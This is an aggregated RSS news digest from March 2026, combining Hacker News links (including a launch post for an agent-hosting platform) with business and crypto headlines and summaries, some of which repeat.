Date of publish: Mon, 09 Mar 2026 17:20:29 +0000

Building a Procedural Hex Map with Wave Function Collapse

Article URL: https://felixturner.github.io/hex-map-wfc/article/

Comments URL: https://news.ycombinator.com/item?id=47311815

Points: 504

# Comments: 72

Article link

Date of publish: Mon, 09 Mar 2026 17:02:22 +0000

DARPA’s new X-76

Article URL: https://www.darpa.mil/news/2026/darpa-new-x-76-speed-of-jet-freedom-of-helicopter

Comments URL: https://news.ycombinator.com/item?id=47311669

Points: 204

# Comments: 182

Article link

Date of publish: Mon, 09 Mar 2026 16:54:31 +0000

Launch HN: Terminal Use (YC W26) – Vercel for filesystem-based agents

Hello Hacker News! We're Filip, Stavros, and Vivek from Terminal Use (https://www.terminaluse.com/). We built Terminal Use to make it easier to deploy agents that work in a sandboxed environment and need filesystems to do work. This includes coding agents, research agents, document processing agents, and internal tools that read and write files.

Here's a demo: https://www.youtube.com/watch?v=ttMl96l9xPA.

Our biggest pain point with hosting agents was that you'd need to stitch together multiple pieces: packaging your agent, running it in a sandbox, streaming messages back to users, persisting state across turns, and managing getting files to and from the agent workspace.

We wanted something like Cog from Replicate, but for agents: a simple way to package agent code from a repo and serve it behind a clean API/SDK. We wanted to provide a protocol to communicate with your agent, but not constraint the agent logic or harness itself.

On Terminal Use, you package your agent from a repo with a config.yaml and Dockerfile, then deploy it with our CLI. You define the logic of three endpoints (on_create, on_event, and on_cancel) which track the lifecycle of a task (conversation). The config.yaml contains details about resources, build context, etc.

Out of the box, we support Claude Agent SDK and Codex SDK agents. By support, we mean that we have an adapter that converts from the SDK message types to ours. If you'd like to use your own custom harness, you can convert and send messages with our types (Vercel AI SDK v6 compatible). For the frontend, we have a Vercel AI SDK provider that lets you use your agent with Vercel's AI SDK, and have a messages module so that you don't have to manage streaming and persistence yourself.

The part we think is most different is storage.

We treat filesystems as first-class primitives, separate from the lifecycle of a task. That means you can persist a workspace across turns, share it between different agents, or upload / download files independent of the sandbox being active. Further, our filesystem SDK provides presigned urls which makes it easy for your users to directly upload and download files which means that you don't need to proxy file transfer through your backend.

Since your agent logic and filesystem storage are decoupled, this makes it easy to iterate on your agents without worrying about the files in the sandbox: if you ship a bug, you can deploy and auto-migrate all your tasks to the new deployment. If you make a breaking change, you can specify that existing tasks stay on the existing version, and only new tasks use the new version.

We're also adding support for multi-filesystem mounts with configurable mount paths and read/write modes, so storage stays durable and reusable while mount layout stays task-specific.

On the deployment side, we've been influenced by modern developer platforms: simple CLI deployments, preview/production environments, git-based environment targeting, logs, and rollback. All the configuration you need to build, deploy & manage resources for your agent is stored in the config.yaml file which makes it easy to build & deploy your agent in CI/CD pipelines.

Finally, we've explicitly designed our platform for your CLI coding agents to help you build, test, & iterate with your agents. With our CLI, your coding agents can send messages to your deployed agents, and download filesystem contents to help you understand your agent's output. A common way we test our agents is that we make markdown files with user scenarios we'd like to test, and then ask Claude Code to impersonate our users and chat with our deployed agent.

What we do not have yet: full parity with general-purpose sandbox providers. For example, preview URLs and lower-level sandbox.exec(...) style APIs are still on the roadmap.

We're excited to hear any thoughts, insights, questions, and concerns in the comments below!


Comments URL: https://news.ycombinator.com/item?id=47311657

Points: 102

# Comments: 73

Article link

Date of publish: Mon, 09 Mar 2026 16:53:52 +0000

JSLinux Now Supports x86_64

Article URL: https://bellard.org/jslinux/

Comments URL: https://news.ycombinator.com/item?id=47311484

Points: 330

# Comments: 99

Article link

Date of publish: Mon, 09 Mar 2026 16:43:39 +0000

An opinionated take on how to do important research that matters

Article URL: https://nicholas.carlini.com/writing/2026/how-to-win-a-best-paper-award.html

Comments URL: https://news.ycombinator.com/item?id=47311179

Points: 134

# Comments: 33

Article link

Date of publish: Mon, 09 Mar 2026 16:24:22 +0000

Is legal the same as legitimate: AI reimplementation and the erosion of copyleft

Article URL: https://writings.hongminhee.org/2026/03/legal-vs-legitimate/

Comments URL: https://news.ycombinator.com/item?id=47310160

Points: 479

# Comments: 496

Article link

Date of publish: Mon, 09 Mar 2026 15:12:53 +0000

Business RSS

Business sites below.

Cointelegraph.com News

Tokenized stocks surpass $1B as Ondo, xStocks dominate sector

Tokenized stocks surpass $1B as Ondo, xStocks dominate sector

Foresight Ventures says regulatory barriers and liquidity advantages are driving consolidation in tokenized equities as the market expands.

Tokenized stocks have surpassed $1 billion in total value on-chain, marking a new milestone for the fast-growing real-world asset (RWA) sector.

Data from RWA.xyz shows the value of tokenized equities climbing past the $1 billion mark, as platforms offering blockchain-based exposure to traditional stocks attract more trading activity and liquidity.

Much of that activity is concentrated among a small number of players. RWA.xyz data and a report released Tuesday by Foresight Ventures show Ondo as the largest tokenized stock platform by value, while xStocks products account for another significant share of the market.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 10:27:40 +0000

Thailand crypto platforms freeze 10K accounts in AML crackdown: Report

Thailand crypto platforms freeze 10K accounts in AML crackdown: Report

Thai crypto operators reportedly froze 10,000 suspected “mule accounts” as new AML checks and transfer delays took effect in a wider anti-fraud push.

Thai cryptocurrency platform operators have reportedly frozen more than 10,000 accounts suspected of being used to launder illicit funds, as the country steps up efforts to crack down on so-called mule accounts.

The freezes followed the rollout of stricter screening measures aimed at slowing suspicious crypto transfers and requiring additional Know Your Customer checks before higher-risk transactions are completed, according to local reporting from the Bangkok Post on Tuesday.

The tighter process helped operators identify and freeze more than 10,000 suspected mule accounts, Att Thongyai Asavanund, chief executive of KuCoin Thailand and chairman of the Thai Digital Asset Operators Trade Association (TDO), told the Bangkok Post.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 09:56:27 +0000

US Bitcoin ETFs add $167M as altcoin funds extend outflows

US Bitcoin ETFs add $167M as altcoin funds extend outflows

US Bitcoin ETFs added $167 million in inflows on Monday, while Ether, XRP and Solana funds saw three-day outflows despite a crypto market rebound.

US spot Bitcoin exchange-traded funds posted net inflows on Monday, snapping a two-session stretch of outflows as Bitcoin rose toward $70,000 and investor demand returned to the largest cryptocurrency.

Spot Bitcoin (BTC) ETFs recorded $167 million of inflows on Monday, following around $577 million in outflows on Thursday and Friday, according to SoSoValue data.

Demand was weaker across other crypto-linked ETFs. Altcoin funds experienced significant selling pressure, with outflows persisting across Ether (ETH), XRP (XRP) and Solana (SOL) ETFs even as the underlying tokens rose 3-5% over the past 24 hours, according to CoinGecko data.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 08:57:09 +0000

News Ticker - markets.businessinsider.com

REalloys Announces Closing of Upsized $50 Million Public Offering

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify">BOCA RATON, Fla., March 09, 2026 (GLOBE NEWSWIRE) -- REalloys Inc. (NASDAQ: ALOY) (the "Company" or "REalloys"), a U.S.-based mine-to-magnet rare earth company, today announced the closing of its previously announced...

Article link

Date of publish: Mon, 09 Mar 2026 14:43:53 GMT

EQS-PVR: NORMA Group SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution

<table border="0"><tr><td> EQS Voting Rights Announcement: NORMA Group SE <br/> NORMA Group SE: Release according to Article 40, Section 1 of the WpHG [the German Securities Trading Act] with the objective of Europe-wide distribution <br/><br/> 09.03.2026 / 15:42 CET/CEST<br/> Dissemination of a Voting Rights...

Article link

Date of publish: Mon, 09 Mar 2026 14:42:13 GMT

Pushpay and Barna Group's 2026 State of Church Technology Report Shows Church Tech Has Moved Past Adoption — Now Alignment Is What Matters

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />REDMOND, Wash., March 09, 2026 (GLOBE NEWSWIRE) -- <a href="https://www.globenewswire.com/Tracker?data=JQwAqRBb9p9uVPS7TPq7RxDDQaxvxen_TJeUMdYSU6wTV8Yr6qnMVmAjdN6hcC3clC-73JsmImyK-1KA-ayXIQ==" rel="nofollow" target="_blank"><u>Pushpay</u></a>, the...

Article link

Date of publish: Mon, 09 Mar 2026 14:40:03 GMT

BBC News

Energy prices fall and stocks rise after Trump says Iran war 'very complete'

The US president's comments lead to a drop in crude costs and a rebound in shares.

Article link

Date of publish: Tue, 10 Mar 2026 09:05:05 GMT

How the Iran war may affect your money and bills

The conflict in the Middle East could raise the cost of petrol, household energy bills and even food.

Article link

Date of publish: Tue, 10 Mar 2026 10:20:12 GMT

China exports surge despite Trump tariffs

Official data shows shipments rose by 20% this year with growth in European and other Asia markets.

Article link

Date of publish: Tue, 10 Mar 2026 06:16:02 GMT

The world this week

Cover Story newsletter: A war without a strategy

An exclusive look at how we designed this week’s cover

Article link

Date of publish: Fri, 06 Mar 2026 18:03:29 +0000

The weekly cartoon

Article link

Date of publish: Thu, 05 Mar 2026 13:45:01 +0000

Business

Article link

Date of publish: Thu, 05 Mar 2026 13:45:01 +0000

Fortune | FORTUNE

The AI risk that few organizations are governing

You know how many human users have access to your financial systems. Do you know how many AI agents do?

Article link

Date of publish: Tue, 10 Mar 2026 10:00:00 +0000

AI isn’t killing jobs yet—CEOs are using layoffs to fund a $2.5 trillion arms race

Also: All the news and watercooler chat from Fortune.

Article link

Date of publish: Tue, 10 Mar 2026 09:41:30 +0000

How Walmart CEO John Furner is using his father’s lessons—and AI—to steer a $1 trillion giant

John Furner recently took the reins of Walmart, and now leads a $1 trillion retail giant. But it’s the early-life lessons from his dad that helped shape his leadership today.

Article link

Date of publish: Tue, 10 Mar 2026 09:10:00 +0000

Business

All News

Nio shares jump as Q4 results, outlook beat forecasts

Article link

Date of publish: 2026-03-10 10:51:38

Oil demand destruction would likely require prices around $155/bbl: Bernstein

Article link

Date of publish: 2026-03-10 10:36:28

U.S. stock futures climb, oil declines as Trump says Iran war to end soon

Article link

Date of publish: 2026-03-10 10:36:04

Cointelegraph.com News

Tokenized stocks surpass $1B as Ondo, xStocks dominate sector

Tokenized stocks surpass $1B as Ondo, xStocks dominate sector

Foresight Ventures says regulatory barriers and liquidity advantages are driving consolidation in tokenized equities as the market expands.

Tokenized stocks have surpassed $1 billion in total value on-chain, marking a new milestone for the fast-growing real-world asset (RWA) sector.

Data from RWA.xyz shows the value of tokenized equities climbing past the $1 billion mark, as platforms offering blockchain-based exposure to traditional stocks attract more trading activity and liquidity.

Much of that activity is concentrated among a small number of players. RWA.xyz data and a report released Tuesday by Foresight Ventures show Ondo as the largest tokenized stock platform by value, while xStocks products account for another significant share of the market.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 10:27:40 +0000

Thailand crypto platforms freeze 10K accounts in AML crackdown: Report

Thailand crypto platforms freeze 10K accounts in AML crackdown: Report

Thai crypto operators reportedly froze 10,000 suspected “mule accounts” as new AML checks and transfer delays took effect in a wider anti-fraud push.

Thai cryptocurrency platform operators have reportedly frozen more than 10,000 accounts suspected of being used to launder illicit funds, as the country steps up efforts to crack down on so-called mule accounts.

The freezes followed the rollout of stricter screening measures aimed at slowing suspicious crypto transfers and requiring additional Know Your Customer checks before higher-risk transactions are completed, according to local reporting from the Bangkok Post on Tuesday.

The tighter process helped operators identify and freeze more than 10,000 suspected mule accounts, Att Thongyai Asavanund, chief executive of KuCoin Thailand and chairman of the Thai Digital Asset Operators Trade Association (TDO), told the Bangkok Post.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 09:56:27 +0000

US Bitcoin ETFs add $167M as altcoin funds extend outflows

US Bitcoin ETFs add $167M as altcoin funds extend outflows

US Bitcoin ETFs added $167 million in inflows on Monday, while Ether, XRP and Solana funds saw three-day outflows despite a crypto market rebound.

US spot Bitcoin exchange-traded funds posted net inflows on Monday, snapping a two-session stretch of outflows as Bitcoin rose toward $70,000 and investor demand returned to the largest cryptocurrency.

Spot Bitcoin (BTC) ETFs recorded $167 million of inflows on Monday, following around $577 million in outflows on Thursday and Friday, according to SoSoValue data.

Demand was weaker across other crypto-linked ETFs. Altcoin funds experienced significant selling pressure, with outflows persisting across Ether (ETH), XRP (XRP) and Solana (SOL) ETFs even as the underlying tokens rose 3-5% over the past 24 hours, according to CoinGecko data.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 08:57:09 +0000

Blackstone-owned AirTrunk secures record $1.24B loan for Tokyo AI data center

Blackstone-owned AirTrunk secures record $1.24B loan for Tokyo AI data center

A consortium of 12 banks, led by SMBC, MUFG, Crédit Agricole CIB and Société Générale, arranged the record financing for AirTrunk’s Tokyo data center expansion.

Hyperscale data center operator AirTrunk has secured a 191.6 billion Japanese yen ($1.24 billion) green loan to refinance and expand its TOK1 data center campus in the greater Tokyo area, marking what it described as the largest data center financing completed in Japan.

The loan will support the next development phases of the TOK1 campus, which is designed to scale beyond 300 megawatts (MW) of capacity, the company, which is owned by a consortium led by Blackstone and CPP Investments, announced on Tuesday. The expansion is intended to meet rising demand for cloud services and AI infrastructure as Japan ramps up investment in digital computing capacity.

“Japan is one of the world’s most important cloud and AI markets, and we’re committed to building the digital infrastructure that enables its long-term growth,” AirTrunk founder and CEO Robin Khuda said.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 08:35:05 +0000

Tron joins Agentic AI Foundation as founder sees future in AI

Tron joins Agentic AI Foundation as founder sees future in AI

Tron joined the Linux Foundation’s Agentic AI Foundation to help develop open infrastructure for AI agents alongside members including Circle and JPMorgan.

Update (March 10 at 10:08 am UTC): This article has been updated to include additional comments from Tron founder Justin Sun.

The Tron network has joined the Linux Foundation’s Agentic AI Foundation (AAIF) as a governing member to support the development of infrastructure for AI agents.

In an announcement on Monday, Tron’s decentralized autonomous organization (DAO) said the network joined the Agentic AI Foundation and will serve on its governing board.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 06:49:48 +0000

Bhutan moves $11.8M in BTC from its national stash: Arkham

Bhutan moves $11.8M in BTC from its national stash: Arkham

Bhutan has accumulated around 13,000 Bitcoin since launching state-backed mining operations in 2019, primarily fueled by hydroelectric energy.

Bhutan, one of the world’s largest nation-state Bitcoin holders, moved 175 Bitcoin from its main holding address as cryptocurrency markets posted modest gains on Monday.

Data from the blockchain analytics platform Arkham shows that the South Asian country moved $11.85 million worth of BTC to an address created a month ago, which previously received 184 Bitcoin from the government.

The 175 Bitcoin remain at the address as of Tuesday, according to blockchain data. However, the previous transfer of 184 was sent to a third address, which has received a total of 1,910 Bitcoin since 2024 and currently holds 126.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 06:10:02 +0000

Vitalik Buterin envisions ‘one-click’ Ether staking for institutions

Vitalik Buterin envisions ‘one-click’ Ether staking for institutions

“We want the authority over staking nodes to be highly distributed, and the first step to doing this is to make it easy,” said Ethereum co-founder Vitalik Buterin.

Ethereum co-founder Vitalik Buterin said the Ethereum Foundation used simplified distributed validator technology, or “DVT-lite,” to stake 72,000 Ether (ETH) in February.

“My hope for this project is that in the process, we can make it maximally easy and one-click to do distributed staking for institutions,” said Buterin on X on Monday.

Buterin explained that with DVT-lite, users can “choose which computers run their nodes, make a config file where they all have the same key, and then from there everything gets set up automatically.”

Read more

Article link

Date of publish: Tue, 10 Mar 2026 06:06:56 +0000

US prosecutors seek Roman Storm retrial after mixed verdict

US prosecutors seek Roman Storm retrial after mixed verdict

Manhattan US Attorney Jay Clayton asked a judge to schedule a retrial in October for Tornado Cash co-founder Roman Storm on two charges where the jury failed to reach a verdict.

US prosecutors are seeking a retrial for Tornado Cash co-founder Roman Storm after a jury failed to reach a unanimous verdict on two charges at his trial last year.

US Attorney for Manhattan Jay Clayton asked federal Judge Katherine Polk Failla in a letter on Monday for a trial date to retry Storm on charges of conspiracy to commit money laundering and conspiracy to violate sanctions.

The letter asked the court for the retrial to begin on or around Oct. 5 to 12, with the trial expected to last three weeks. It said prosecutors were prepared to retry the case as early as spring, between March and May, but Storm’s defense lawyers said they weren’t available until late 2026.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 05:58:17 +0000

Wall Street funneled $540M into US Solana ETFs in Q4: Bloomberg

Wall Street funneled $540M into US Solana ETFs in Q4: Bloomberg

Investment advisors were the biggest buyers of the US-based spot Solana ETFs at over $270 million, while hedge fund managers came in next at $186 million.

Silicon Valley-based venture capital firm Electric Capital and investment bank Goldman Sachs were the two largest buyers of spot Solana exchange-traded funds, which launched for trading in the US in October last year.

Data shared by Bloomberg ETF analyst James Seyffart on Monday shows that the top 30 institutional holders of US spot Solana (SOL) exchange-traded funds bought more than $540 million worth of ETFs during the quarter.

Electric Capital and Goldman Sachs held the top two positions with $137.8 million and $107.4 million worth of Solana ETF exposure, while Elequin Capital, SIG Holding and Multicoin Capital rounded out the top five.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 05:21:29 +0000

Sharplink reports $735M loss in 2025 as Ethereum slumped

Sharplink reports $735M loss in 2025 as Ethereum slumped

Sharplink says it will continue to acquire Ether despite a brutal crypto market sell-off last year that led to a $616.2 million paper loss on its ETH holdings. 

Ethereum treasury firm Sharplink reported a $734.6 million net loss for 2025, largely driven by a sharp crypto market decline in the second half of the year.

The firm posted its financial results for the year on Monday, revealing that its full-year net loss was primarily driven by a $616.2 million paper loss on the 868,699 Ether (ETH) it has accumulated to date.

Adding to its losses was a $140.2 million impairment charge related to converting its staked Ether.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 05:06:33 +0000

Oil tumbles, crypto gains as Trump sends mixed signals over Iran war

Oil tumbles, crypto gains as Trump sends mixed signals over Iran war

“I think the war is very complete, pretty much,” Donald Trump told reporters before posting on his social media platform later that “Death, Fire, and Fury” will reign upon Iran.

Oil prices fell while cryptocurrencies posted modest gains on Monday after US President Donald Trump told reporters that war with Iran could be coming to an end — even as he later ramped up the war rhetoric again on social media.

In a phone interview with CBS News on Monday, Trump made it appear that the war in Iran was wrapping up. The US military claims to have struck more than 3,000 Iranian targets in the first week of operations.

“I think the war is very complete, pretty much,” Donald Trump told CBS News. “If you look, they have nothing left. There’s nothing left in a military sense,” he added.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 04:00:18 +0000

AI firm Anthropic sues Trump admin over ‘supply chain risk’ label

AI firm Anthropic sues Trump admin over ‘supply chain risk’ label

Anthropic is the first US company the Pentagon has labeled a risk to the military, with the AI company calling it “unprecedented and unlawful.”

Anthropic, the creator of the AI software Claude, has sued the Trump administration for what it says is an “unlawful campaign of retaliation” after the company refused to allow the military unrestricted use of its technology.

Anthropic sued multiple government agencies and officials in a California federal court on Monday, asking the court to reverse the Department of Defense’s decision to label the company a “supply chain risk.”

It also seeks to overturn US President Donald Trump’s directive to federal employees to stop using Claude. Anthropic also filed suit in a Washington, D.C., appeals court to challenge the Defense Department’s decision.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 02:56:04 +0000

US banking lobby weighs lawsuit against OCC over crypto trust charters

US banking lobby weighs lawsuit against OCC over crypto trust charters

The OCC has granted conditional approvals to several crypto firms since December, including BitGo, Ripple, Paxos, and Crypto.com, while others such as Zerohash have filed applications.

A US trade group made up of some of the country’s biggest banks is reportedly considering suing the Office of the Comptroller of the Currency (OCC), arguing that granting crypto firms bank charters could put Americans and the financial system at risk.

According to a report on Monday by The Guardian, citing a “source familiar with the lobby’s thinking,” the Bank Policy Institute (BPI) is weighing legal options after the OCC failed to heed warnings from banking groups over its reinterpretation of federal licensing rules.

In December, the OCC granted conditional national trust bank charter approvals to several crypto firms, including BitGo, Fidelity Digital Assets, Ripple and Paxos. A growing number of other crypto companies have followed suit since.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 02:52:17 +0000

NFT lending protocol Gondi says platform secured after $230K exploit

NFT lending protocol Gondi says platform secured after $230K exploit

Gondi said only the Sell & Repay smart contract was affected and that it is safe to continue buying, selling, trading and listing NFTs on the platform.

Nonfungible token platform Gondi said it has disabled the faulty smart contract that allowed a hacker to steal $230,000 worth of NFTs from the protocol, adding it is now in the process of compensating affected customers.

Gondi said in an X post on Monday that the hacker exploited the “Sell & Repay” contract, which lets borrowers sell escrowed NFTs and automatically repay loans on the platform.

Gondi noted that an updated version of that contract was deployed on Feb. 20 but didn’t confirm how the hacker managed to exploit it. Gondi said no other part of the platform was affected by the exploit.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 02:38:22 +0000

Zcash devs raise $25M from major VCs months after ECC split

Zcash devs raise $25M from major VCs months after ECC split

The Zcash token rose 4.1% to $217.80 on news of the $25 million funding round and is now up 9.8% over the last 24 hours.

The development team that left Electric Coin Company in January to launch Zcash Open Development Lab (ZODL) has raised over $25 million from the likes of a16z Crypto and Coinbase Ventures to continue building the privacy-focused, self-custodial Zodl wallet.

ZODL was founded by former ECC CEO Josh Swihart and includes the entire engineering and product team that previously worked on the Zodl wallet at ECC. They resigned due to disputes with Bootstrap, the nonprofit that oversees ECC, over how Zcash should function as a privacy protocol.

ZODL said in an X post on Monday that crypto-focused investment firms Paradigm, Winklevoss Capital, Cypherpunk Technologies, Maelstrom, and Chapter One were among the other participants in the $25 million funding round.

Read more

Article link

Date of publish: Tue, 10 Mar 2026 01:35:04 +0000

Bitcoin vs gold: ETF flows point to early capital rotation signs

Bitcoin vs gold: ETF flows point to early capital rotation signs

Bitcoin ETF inflows have turned positive as gold ETFs see record outflows after a historic rally. Is capital beginning to rotate from gold to Bitcoin?

Bitcoin (BTC) exchange-traded fund (ETF) flows have turned net positive over the past 30 days, while gold ETF demand has started to slow down after nine straight months of inflows. The shift comes even as gold prices remain elevated and sentiment around Bitcoin continues to cool.

With these contrasting trends in ETF flows and the historical pattern of Bitcoin-to-gold performance cycles, analysts are now examining data that may signal a gradual shift in investor demand between the two assets.&nbsp;

According to the Kobeissi Letter, the largest US gold-backed ETF, GLD, recorded a $3 billion outflow on Wednesday, the largest daily withdrawal in more than two years. The move followed a 4.4% decline in gold prices, the sharpest drop since the Jan. 30 sell-off.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 23:54:52 +0000

Here’s what happened in crypto today

Here’s what happened in crypto today

Need to know what happened in crypto today? Here is the latest news on daily trends and events impacting Bitcoin price, blockchain, DeFi, NFTs, Web3 and crypto regulation.

Today in crypto, the US has sought to retry Tornado Cash co-founder Roman Storm, insurance broker Aon is testing stablecoins for paying insurance premiums and Bithumb reportedly risks a partial business suspension for negligence around money laundering and customer verification practices.

US prosecutors asked a Manhattan federal court on Monday for a retrial of crypto mixer Tornado Cash co-founder Roman Storm after a jury failed to reach a unanimous verdict on two charges at his trial last year.

US Attorney for Manhattan Jay Clayton requested a trial date in early October to retry Storm on charges of conspiracy to commit money laundering and conspiracy to violate sanctions.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 22:09:20 +0000

Will Bitcoin follow oil’s historic surge and rally to $79K before the end of March?

Will Bitcoin follow oil’s historic surge and rally to $79K before the end of March?

Historical data shows that Bitcoin typically gains 20% within a month of major spikes in oil prices. Should traders prepare for a rally to $79,000?

Key takeaways:

Oil price spikes often precede 20% spikes in Bitcoin value, though initial market reactions remain volatile and unpredictable.

Bitcoin currently mirrors tech stocks with an 81% Nasdaq 100 correlation, making it less sensitive to oil prices.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 22:07:11 +0000

Crypto-backed PAC spends $8.6M in Illinois races ahead of US midterms

Crypto-backed PAC spends $8.6M in Illinois races ahead of US midterms

The political action committee Fairshake continues to report spending on political candidates from its $193 million war chest, largely funded by crypto interest groups.

Crypto-backed political action committee Fairshake reported additional spending in Illinois congressional races with the US midterm elections less than eight months away.

In filings on Sunday with the Federal Election Commission, Fairshake reported a $16,000 media buy to oppose Illinois state representative La Shawn Ford in his run for the US Congress in 2026, adding to its roughly $1.8 million spent in 2026 on the race. The state is set to hold primary elections on March 17.

The filing followed others from Friday, showing that the PAC spent more than $5.5 million to oppose Illinois Lieutenant Governor Juliana Stratton, who is running as a Democrat for the US Senate in the midterm elections. Protect Progress, a Fairshake associated group supporting Democratic candidates, reported about $84,000 spent to support Nikki Budzinski for her 2026 House run in Illinois, and $90,000 for Robin Kelly’s Illinois Senate race.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 21:50:17 +0000

Nasdaq links EU markets to Börse Stuttgart's tokenized settlement venue

Nasdaq links EU markets to Börse Stuttgart's tokenized settlement venue

The partnership aims to reduce fragmentation in European capital markets by enabling blockchain-based settlement of tokenized securities.

Nasdaq said it is working with Börse Stuttgart Group’s tokenized settlement platform Seturion to connect its European trading venues to infrastructure designed to settle tokenized securities using distributed ledger technology.

According to Monday’s announcement, the collaboration will initially focus on structured products and aims to support faster settlement of tokenized assets across European capital markets.

Seturion supports multiple asset classes across public and private distributed ledger networks and allows transactions to be settled using either central bank money or on-chain cash. Börse Stuttgart said the platform is intended to be open to a broader network of financial institutions across Europe.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 21:23:00 +0000

China’s ‘50x’ blockchain boost, Alibaba-linked AI mines Bitcoin: Asia Express

China’s new chip boosts blockchain speed 50x. An autonomous agent linked to Alibaba tries to mine Bitcoin. Asia Express

Article link

Date of publish: Mon, 09 Mar 2026 21:22:47 +0000

Aon tests stablecoin payments for insurance premiums with Paxos, Coinbase

Aon tests stablecoin payments for insurance premiums with Paxos, Coinbase

The insurance broker is piloting stablecoin payments for premiums using USDC and PYUSD, testing blockchain settlement rails for faster payments in global insurance markets.

Aon, one of the world’s largest insurance brokers, is testing the use of stablecoins to pay insurance premiums, highlighting the growing role of digital dollars in traditional financial infrastructure following the passage of the GENIUS Act last year.

In a Monday announcement, UK-based Aon said it completed a pilot that settled insurance premiums for clients, including Coinbase and Paxos, using USDC (USDC) on Ethereum and PayPal USD (PYUSD) on Solana.

Tim Fletcher, CEO of Aon’s financial services division, said the pilot reflects the company’s effort to explore stablecoins as a payment rail, predicting that tokenized assets will become more widely used in financial transactions.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 20:55:47 +0000

Wyoming Senator revives crypto tax exemption debate amid market structure talks

Wyoming Senator revives crypto tax exemption debate amid market structure talks

Cynthia Lummis continues to push pro-crypto policies in a market structure bill under consideration in the Senate, even as she prepares to leave Congress in January 2027.

Cynthia Lummis, one of Wyoming’s two US senators, who announced plans to leave the chamber in 2027, has revived a push for a de minimis tax exclusion on small cryptocurrency transactions as the Senate debates a digital asset market structure bill.

In a CNBC interview on Wednesday, Lummis said that the House Ways and Means Committee and Senate Finance Committee were considering a $300 exemption to allow crypto users to better use Bitcoin (BTC) for transactions without paying capital gains taxes.

The Wyoming senator’s statement followed her introduction of a standalone bill in July 2025 proposing a de minimis tax exemption for crypto transactions under $300, with a $5,000 limit annually.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 18:38:49 +0000

Price predictions 3/9: SPX, DXY, BTC, ETH, BNB, XRP, SOL, DOGE, ADA, BCH

Price predictions 3/9: SPX, DXY, BTC, ETH, BNB, XRP, SOL, DOGE, ADA, BCH

Buyers were undeterred by surging oil prices, pushing Bitcoin near $69,500 and large-cap altcoins close to their overhead resistance levels.

Key points:

Rising oil prices have not hurt crypto sentiment as buyers attempt to push Bitcoin above $69,000

Buyers are attempting to propel several major altcoins above their overhead resistance levels, indicating demand at lower levels.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 17:57:56 +0000

Blockchain.com expands into Ghana after 700% trading surge in Nigeria

Blockchain.com expands into Ghana after 700% trading surge in Nigeria

The crypto brokerage said increasing demand across West Africa is driving its expansion as user activity grows across the Sub-Saharan region.

Crypto brokerage company Blockchain.com is expanding into Ghana as part of a broader push to grow its presence across Africa, following rapid user growth in Nigeria over the past year.

The company said it plans to offer Ghanaian users access to its trading platform as it builds out regional infrastructure and explores additional African markets.

The expansion follows strong growth in Nigeria, where the company launched retail operations last year and reported more than a 700% increase in brokerage transaction volume. According to the company, the most traded assets on its platform in the country have been Bitcoin (BTC), Tether (USDT) and Tron (TRX).

Read more

Article link

Date of publish: Mon, 09 Mar 2026 17:48:01 +0000

Can you still mine Bitcoin on a PC in 2026? Here is the reality

Can you still mine Bitcoin on a PC in 2026? Here is the reality

Mining Bitcoin on a desktop in 2026 may sound simple, but is it profitable? Do rising network difficulty and energy costs mean the end of PCs as Bitcoin mining equipment?

Bitcoin mining began in 2009 as a hobby-friendly activity where users could earn BTC using CPUs and later GPUs. By 2026, the landscape has shifted entirely to industrial-scale operations dominated by specialized ASIC hardware.

Modern Bitcoin mining runs at roughly 1 zettahash per second, with network difficulty reaching a record 144.4 trillion in February 2026. This makes it virtually impossible for standard PCs to compete meaningfully.

Even when joining mining pools, a home PC’s contribution is so small that payouts amount to negligible fractions of a cent per day, while electricity costs, hardware wear, cooling and fees continue to accumulate.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 17:12:48 +0000

Ether holds $2K as traders make push toward overhead short liquidity

Ether holds $2K as traders make push toward overhead short liquidity

Ether's short liquidity may be the next target for bullish traders who have piled into fresh leveraged positions. Is $2,500 the next stop for ETH price?

Ether (ETH) traded above $2,000 on Monday as derivatives activity intensified across major exchanges, with data showing more than 110,000 ETH in net inflows and leverage ratios climbing to record levels.

The activity points to a rapid buildup of speculative positioning, suggesting traders are preparing for increased volatility as ETH attempts to break out of its monthly trading range.

Ether derivatives exchanges recorded a netflow of 110,343 ETH on March 7, the third-largest spike in 2026. A larger move occurred on Feb. 6, when ETH rallied roughly 13% from its yearly low at $1,736.

Read more

Article link

Date of publish: Mon, 09 Mar 2026 16:14:14 +0000

EU’s regulated blockchain securities market adds first bank participant

EU’s regulated blockchain securities market adds first bank participant

Swiss crypto bank Amina has joined 21X as a regulated banking participant, linking traditional financial institutions with a blockchain-based market for issuing tokenized securities.

Amina, a Swiss-regulated crypto bank, has joined a blockchain-based settlement platform for tokenized securities operating under the European Union’s DLT pilot regime, marking another step toward integrating digital asset infrastructure with traditional capital markets.

The Zug, Switzerland-based company announced Monday that it has become a listing sponsor on the EU-regulated platform 21X, making Amina the venue’s first fully regulated bank participant.

Amina said the move will allow it to support companies issuing tokenized securities on 21X through its partnership with Tokeny, a Luxembourg-based company that provides technology for creating and managing tokenized financial assets.

Read more

Article link

